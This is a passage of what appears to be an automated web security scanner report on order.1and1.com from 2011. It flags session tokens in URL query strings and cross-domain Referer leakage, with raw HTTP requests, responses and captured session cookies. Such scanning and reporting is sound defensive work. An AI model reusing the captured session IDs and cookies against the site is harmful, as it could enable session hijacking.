Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:37:27 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642647822&__frame=_top&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=UaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 20:51:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.120. http://order.1and1.com/xml/webservice/VDSPriceService

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/webservice/VDSPriceService

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /xml/webservice/VDSPriceService;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: text/plain
wstype: jsonws
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=
Content-Length: 57

{"method":"getVDSPrice","params":[1,1,100,"vdslinuxset"]}

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain;charset=utf-8
Content-Length: 249

{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},"campaignPriceString":"0.00","campaignPriceStringBrutto":
...[SNIP]...

4. Cross-domain Referer leakage
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://order.1and1.com/xml/order/CloudDynamicServer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" id="vds-price-default-img" width="58" height="44" src="//img.1und1.de/OdinPrice/grey/m/none/0/50/dollar/month.png" alt="from 0,50 &#8364;/month*"><span class="horz-l-price-reg">
...[SNIP]...
<span class="dcs-price"><img class="price-graphic alphapng" id="vds-price" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="from 0,00 &#8364;/month*"></span>
...[SNIP]...

4.2. http://order.1and1.com/xml/order/Eshops

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 864e2e4f35ed6ab3549b3f5dceba36dd
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64223


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:57:44 GMT; Path=/
ETag: 645ffb56b5336d5e93c4fb610365ea26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18055


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h3><img src="http://www.wsm-demoversion.com/tinc?key=jwW6a5W7" alt="map headquarters"><br>
...[SNIP]...

4.4. http://order.1and1.com/xml/order/Home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/99/none/month-star.png" alt="$ 0.99"></span>
...[SNIP]...
<span class="container"><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/9/99/none/month-star.png" alt="$ 9.99"></span>
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=f933cb0d2dddc861112b1d01266184f9&amp;__ts=1300632652931"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.5. http://order.1and1.com/xml/order/Hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/3/99/none/month.png" alt="ab 3.99 &#8364;/Monat*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00"><span class="itable-price-text-below-offer">
...[SNIP]...

4.6. http://order.1and1.com/xml/order/Instant

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:23:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:37:28 GMT; Path=/
ETag: dbd3f57bd7c94c04d5bf8f590fd16409
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23827


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
rel="scrollbars=no,width=557,height=442" href="/xml/deref?link=https%3A%2F%2Fwww.scanalert.com%2FRatingVerify%3Fref%3Dwww.1and1.com&amp;__sign=24c252289914c20b17cccb226c63acc5&amp;__ts=1300645401904"><img alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" class="mcafee" src="//images.scanalert.com/meter/www.1and1.com/22.gif" width="115"></a>
...[SNIP]...

4.7. http://order.1and1.com/xml/order/LocalSubmission

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/LocalSubmission

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.listlocal HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:25 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=fYGw8P0A2X19fWWxiaS9nYS4gKmNWUCg/SUMrLywsKykrKSYmKSgiJSkcHh0cGT5Db2RmdCwuKVkyXGsxJCUhICUhHyIgGjkwLzhwcTcsM2NsMiUmIiEmIyAjHiEiMjM=; Expires=Fri, 07-Apr-2079 21:48:32 GMT; Path=/
ETag: 9f251cbbda88124ff22e04dd6b22412a
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18612


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="153" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/9/99/none/month-star.png" alt="ab 9.99 &#8364;/Monat*"></span>
...[SNIP]...

4.8. http://order.1and1.com/xml/order/Mail

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Mail

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /xml/order/Mail;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__reuse=1300643443260
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
